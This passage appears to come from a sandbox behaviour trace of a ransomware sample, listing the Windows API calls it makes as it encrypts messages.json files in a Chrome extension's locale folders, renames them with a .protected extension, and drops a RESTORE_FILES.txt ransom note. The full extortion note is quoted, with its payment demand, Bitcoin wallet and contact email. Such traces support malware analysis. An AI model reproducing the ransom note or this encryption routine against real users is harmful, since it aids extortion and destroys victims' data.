(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.769] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.770] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.770] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0078.770] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.770] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0078.770] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.770] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.771] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.771] CloseHandle (hObject=0x168) returned 1 [0078.771] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected") returned 165 [0078.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected")) returned 1 [0078.771] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.771] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.771] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0078.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.772] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.772] lstrlenA (lpString="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") returned 684 [0078.772] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.773] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.773] CloseHandle (hObject=0x164) returned 1 [0078.773] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0078.773] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 141 [0078.773] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0078.773] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0078.773] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*") returned 143 [0078.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.774] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.774] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\.") returned 143 [0078.775] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.775] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.775] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\..") returned 144 [0078.775] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.775] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") 
returned 155 [0078.775] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.775] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.775] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.775] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.776] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.776] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.776] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.776] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.776] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.776] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.777] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.777] CloseHandle (hObject=0x168) returned 1 [0078.777] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected") returned 165 [0078.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected")) returned 1 [0078.778] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.778] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.778] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0078.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.778] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.778] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.779] lstrlenA (lpString="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") returned 684 [0078.779] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.779] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.779] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.779] CloseHandle (hObject=0x164) returned 1 [0078.779] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0078.779] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 144 [0078.779] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0078.779] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0078.779] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*") returned 146 [0078.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.779] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.779] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.779] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\.") returned 146 [0078.780] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.780] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\..") returned 147 [0078.780] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.780] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.780] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.780] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.780] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.780] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.780] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.781] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.781] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.782] CloseHandle (hObject=0x168) returned 1 [0078.782] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0078.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
